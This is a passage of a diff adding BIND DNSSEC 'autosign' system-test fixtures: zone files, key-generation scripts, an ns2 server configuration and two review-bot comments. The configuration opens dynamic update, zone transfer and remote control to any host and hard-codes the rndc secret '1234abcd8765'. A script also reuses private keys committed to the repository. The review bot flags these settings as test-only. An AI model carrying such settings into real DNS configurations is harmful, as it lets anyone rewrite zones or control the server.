@@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/autosign/ns2/child.optout.example.db b/bin/tests/system/autosign/ns2/child.optout.example.db new file mode 100644 index 0000000..8fc3bc8 --- /dev/null +++ b/bin/tests/system/autosign/ns2/child.optout.example.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2006081400 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +@ IN NS ns2.example. diff --git a/bin/tests/system/autosign/ns2/dst.example.db.in b/bin/tests/system/autosign/ns2/dst.example.db.in new file mode 100644 index 0000000..0039484 --- /dev/null +++ b/bin/tests/system/autosign/ns2/dst.example.db.in 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2.example. +a A 10.0.0.1 diff --git a/bin/tests/system/autosign/ns2/example.db.in b/bin/tests/system/autosign/ns2/example.db.in new file mode 100644 index 0000000..a970074 --- /dev/null +++ b/bin/tests/system/autosign/ns2/example.db.in 
@@ -0,0 +1,88 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns2 + NS ns3 +ns2 A 10.53.0.2 +ns3 A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 + +; Used for testing ANY queries +foo TXT "testing" +foo A 10.0.1.0 + +; Used for testing CNAME queries +cname1 CNAME cname1-target +cname1-target TXT "testing cname" + +cname2 CNAME cname2-target +cname2-target TXT "testing cname" + +; Used for testing DNAME queries +dname1 DNAME dname1-target +foo.dname1-target TXT "testing dname" + +dname2 DNAME dname2-target +foo.dname2-target TXT "testing dname" + +; A secure subdomain +secure NS ns.secure +ns.secure A 10.53.0.3 + +; An insecure subdomain +insecure NS ns.insecure +ns.insecure A 10.53.0.3 + +; A insecure subdomain +mustbesecure NS ns.mustbesecure +ns.mustbesecure A 10.53.0.3 + +z A 10.0.0.26 + +nsec3 NS ns.nsec3 +ns.nsec3 A 10.53.0.3 + +optout NS ns.optout +ns.optout A 10.53.0.3 + +nsec3-unknown NS ns.nsec3-unknown +ns.nsec3-unknown A 10.53.0.3 + +optout-unknown NS ns.optout-unknown +ns.optout-unknown A 10.53.0.3 + +multiple NS ns.multiple +ns.multiple A 10.53.0.3 + +rsasha256 NS ns.rsasha256 +ns.rsasha256 A 10.53.0.3 + +rsasha512 NS ns.rsasha512 +ns.rsasha512 A 10.53.0.3 + +nsec3-to-nsec NS ns.nsec3-to-nsec +ns.nsec3-to-nsec A 10.53.0.3 + +oldsigs NS ns.oldsigs +ns.oldsigs A 10.53.0.3 + +dname-at-apex-nsec3 NS ns3 
diff --git a/bin/tests/system/autosign/ns2/insecure.secure.example.db b/bin/tests/system/autosign/ns2/insecure.secure.example.db new file mode 100644 index 0000000..14971bd --- /dev/null +++ b/bin/tests/system/autosign/ns2/insecure.secure.example.db @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns +ns A 10.53.0.3 + +a A 10.0.0.1 +b A 10.0.0.2 +d A 10.0.0.4 +z A 10.0.0.26 diff --git a/bin/tests/system/autosign/ns2/keygen.sh b/bin/tests/system/autosign/ns2/keygen.sh new file mode 100644 index 0000000..087d397 --- /dev/null +++ b/bin/tests/system/autosign/ns2/keygen.sh 
@@ -0,0 +1,66 @@ +#!/bin/sh -e + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +# Have the child generate subdomain keys and pass DS sets to us. +( cd ../ns3 && $SHELL keygen.sh ) + +for subdomain in secure nsec3 autonsec3 optout rsasha256 rsasha512 \ + nsec3-to-nsec oldsigs sync dname-at-apex-nsec3 cds-delete \ + cdnskey-delete +do + cp ../ns3/dsset-$subdomain.example$TP . +done + +# Create keys and pass the DS to the parent. +zone=example +zonefile="${zone}.db" +infile="${zonefile}.in" +cat $infile dsset-*.example$TP > $zonefile + +kskname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q -fk $zone) +$KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q $zone > /dev/null +$DSFROMKEY $kskname.key > dsset-${zone}$TP + +# Create keys for a private secure zone. +zone=private.secure.example +zonefile="${zone}.db" +infile="${zonefile}.in" +ksk=$($KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q -fk $zone) +$KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q $zone > /dev/null +keyfile_to_static_ds $ksk > private.conf +cp private.conf ../ns4/private.conf +$SIGNER -S -3 beef -A -o $zone -f $zonefile $infile > /dev/null + +# Extract saved keys for the revoke-to-duplicate-key test +zone=bar +zonefile="${zone}.db" +infile="${zonefile}.in" +cat $infile > $zonefile +for i in Xbar.+013+59973.key Xbar.+013+59973.private \ + Xbar.+013+60101.key Xbar.+013+60101.private +do + cp $i $(echo $i | sed s/X/K/) +done +$KEYGEN -a ECDSAP256SHA256 -q $zone > /dev/null +$DSFROMKEY Kbar.+013+60101.key > dsset-bar$TP + +# a zone with empty non-terminals. 
+zone=optout-with-ent +zonefile=optout-with-ent.db +infile=optout-with-ent.db.in +cat $infile > $zonefile +kskname=$($KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q -fk $zone) +$KEYGEN -a ${DEFAULT_ALGORITHM} -3 -q $zone > /dev/null diff --git a/bin/tests/system/autosign/ns2/named.conf.in b/bin/tests/system/autosign/ns2/named.conf.in new file mode 100644 index 0000000..d70306a --- /dev/null +++ b/bin/tests/system/autosign/ns2/named.conf.in 
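Review bot: In autosign/ns2/keygen.sh the "revoke-to-duplicate-key" block copies private keys that are committed to the repository (`Xbar.+013+59973.private`, `Xbar.+013+60101.private`) into live `K*` files, and its comment does not say why fixed key material is needed or why it is stored under an `X` prefix. A comment such as `# Fixed test-only keys, kept for their key IDs; stored as X* so clean.sh's "rm -f */K*" leaves them in place.` would record that and would also explain why the next `$KEYGEN` call hard-codes `-a ECDSAP256SHA256` rather than `${DEFAULT_ALGORITHM}`. That reason is inferred from the file names and from clean.sh, so confirm it before committing the wording. Separately, `kskname` assigned in the `optout-with-ent` block is never read afterwards; redirecting that call to `/dev/null` like the line after it would match the rest of the script.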
@@ -0,0 +1,108 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion no;
+ notify yes;
+ dnssec-validation yes;
+ dnssec-loadkeys-interval 30;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "bar" {
+ type primary;
+ file "bar.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+ dnssec-dnskey-kskonly yes;
+};
+
+zone "private.secure.example" {
+ type primary;
+ file "private.secure.example.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "insecure.secure.example" {
+ type primary;
+ file "insecure.secure.example.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "child.nsec3.example" {
+ type primary;
+ file "child.nsec3.example.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "child.optout.example" {
+ type primary;
+ file "child.optout.example.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+zone "optout-with-ent" {
+ type primary;
+ file "optout-with-ent.db";
+ allow-query { any; };
+ allow-transfer { any; };
+ allow-update { any; };
+ auto-dnssec maintain;
+};
+
+include "trusted.conf";
diff --git a/bin/tests/system/autosign/ns2/optout-with-ent.db.in b/bin/tests/system/autosign/ns2/optout-with-ent.db.in
new file mode 100644
index 0000000..5a3e207
--- /dev/null
+++ b/bin/tests/system/autosign/ns2/optout-with-ent.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns2.example. . (
+ 2010042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2.example.
+sub1.ent NS .
+sub2.ent NS .
diff --git a/bin/tests/system/autosign/ns2/private.secure.example.db.in b/bin/tests/system/autosign/ns2/private.secure.example.db.in
new file mode 100644
index 0000000..29fcddf
--- /dev/null
+++ b/bin/tests/system/autosign/ns2/private.secure.example.db.in
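Review bot: In ns2/named.conf.in nothing marks the file as a test fixture, yet every primary zone sets `allow-update { any; }` and `allow-transfer { any; }`, and the `controls` block accepts `allow { any; }` with the fixed secret `1234abcd8765`. These settings are contained only by the listener being bound to the 10.53.0.2 test address. A line next to `// NS2` such as `// Test fixture: open update/transfer/control ACLs and a fixed rndc secret; never reuse outside the system-test addresses` would stop the block being copied into a real configuration. The ns3/named.conf.in hunk later in this change carries the same key and control ACL, so the same comment applies there.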
@@ -0,0 +1,27 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.2
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+private2secure-nxdomain CNAME r.example.
diff --git a/bin/tests/system/autosign/ns3/autonsec3.example.db.in b/bin/tests/system/autosign/ns3/autonsec3.example.db.in
new file mode 100644
index 0000000..17964e8
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/autonsec3.example.db.in
@@ -0,0 +1,37 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a A 10.0.0.3
+child NS ns2.example.
+insecure NS ns.insecure
+ns.insecure A 10.53.0.3
+secure NS ns.secure
+ns.secure A 10.53.0.3
+nsec3 NS ns.nsec3
+ns.nsec3 A 10.53.0.3
+optout NS ns.optout
+ns.optout A 10.53.0.3
+02HC3EM7BDD011A0GMS3HKKJT2IF5VP8 A 10.0.0.17
diff --git a/bin/tests/system/autosign/ns3/cdnskey-delete.example.db.in b/bin/tests/system/autosign/ns3/cdnskey-delete.example.db.in
new file mode 100644
index 0000000..3083a79
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/cdnskey-delete.example.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, You can obtain one at http://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/cds-delete.example.db.in b/bin/tests/system/autosign/ns3/cds-delete.example.db.in
new file mode 100644
index 0000000..3083a79
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/cds-delete.example.db.in
@@ -0,0 +1,28 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, You can obtain one at http://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
+a.a.a.a.a.a.a.a.a.a.e A 10.0.0.27
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/delay.example.db b/bin/tests/system/autosign/ns3/delay.example.db
new file mode 100644
index 0000000..0b11a00
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/delay.example.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2009102722 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/delzsk.example.db.in b/bin/tests/system/autosign/ns3/delzsk.example.db.in
new file mode 100644
index 0000000..14fef54
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/delzsk.example.db.in
@@ -0,0 +1,25 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000010101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+sub NS ns.sub
+ DS 12345 8 1 0000000000000000000000000000000000000000
+ns.sub A 10.53.0.3
diff --git a/bin/tests/system/autosign/ns3/dname-at-apex-nsec3.example.db.in b/bin/tests/system/autosign/ns3/dname-at-apex-nsec3.example.db.in
new file mode 100644
index 0000000..080d111
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/dname-at-apex-nsec3.example.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns3.example. . 1 1200 1200 1814400 3600
+@ NS ns3.example.
+@ DNAME example.
+@ NSEC3PARAM 1 0 0 -
diff --git a/bin/tests/system/autosign/ns3/inacksk2.example.db.in b/bin/tests/system/autosign/ns3/inacksk2.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/inacksk2.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/inacksk3.example.db.in b/bin/tests/system/autosign/ns3/inacksk3.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/inacksk3.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/inaczsk.example.db.in b/bin/tests/system/autosign/ns3/inaczsk.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/inaczsk.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/inaczsk2.example.db.in b/bin/tests/system/autosign/ns3/inaczsk2.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/inaczsk2.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/inaczsk3.example.db.in b/bin/tests/system/autosign/ns3/inaczsk3.example.db.in
new file mode 100644
index 0000000..1376922
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/inaczsk3.example.db.in
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+x CNAME a
diff --git a/bin/tests/system/autosign/ns3/insecure.example.db b/bin/tests/system/autosign/ns3/insecure.example.db
new file mode 100644
index 0000000..14971bd
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/insecure.example.db
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
+a A 10.0.0.1
+b A 10.0.0.2
+d A 10.0.0.4
+z A 10.0.0.26
diff --git a/bin/tests/system/autosign/ns3/jitter.nsec3.example.db.in b/bin/tests/system/autosign/ns3/jitter.nsec3.example.db.in
new file mode 100644
index 0000000..8a96023
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/jitter.nsec3.example.db.in
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 2000042407 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.3
+
diff --git a/bin/tests/system/autosign/ns3/keygen.sh b/bin/tests/system/autosign/ns3/keygen.sh
new file mode 100644
index 0000000..53547d3
--- /dev/null
+++ b/bin/tests/system/autosign/ns3/keygen.sh
@@ -0,0 +1,399 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+SYSTESTDIR=autosign
+
+dumpit () {
+ echo_d "${debug}: dumping ${1}"
+ cat "${1}" | cat_d
+}
+
+setup () {
+ echo_i "setting up zone: $1"
+ debug="$1"
+ zone="$1"
+ zonefile="${zone}.db"
+ infile="${zonefile}.in"
+ n=$((${n:-0} + 1))
+}
+
+setup secure.example
+cp $infile $zonefile
+ksk=$($KEYGEN -a $DEFAULT_ALGORITHM -3 -q -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -a $DEFAULT_ALGORITHM -3 -q $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# NSEC3/NSEC test zone
+#
+setup secure.nsec3.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# NSEC3/NSEC3 test zone
+#
+setup nsec3.nsec3.example
+cp $infile $zonefile
+ksk=$($KEYGEN -q -a $DEFAULT_ALGORITHM -3 -fk $zone 2> kg.out) || dumpit kg.out
+$KEYGEN -q -a $DEFAULT_ALGORITHM -3 $zone > kg.out 2>&1 || dumpit kg.out
+$DSFROMKEY $ksk.key > dsset-${zone}$TP
+
+#
+# Jitter/NSEC3 test zone
+#
+setup jitter.nsec3.example
+cp $infile $zonefile
+count=1
+while [ $count -le 1000 ]
+do
+ echo "label${count} IN TXT label${count}" >> $zonefile
+ count=$((count + 1))
+done
+# Don't create keys just yet, because the scenario we want to test
+# is an unsigned zone that has a NSEC3PARAM record added with
+# dynamic update before the keys are generated.
+
+#
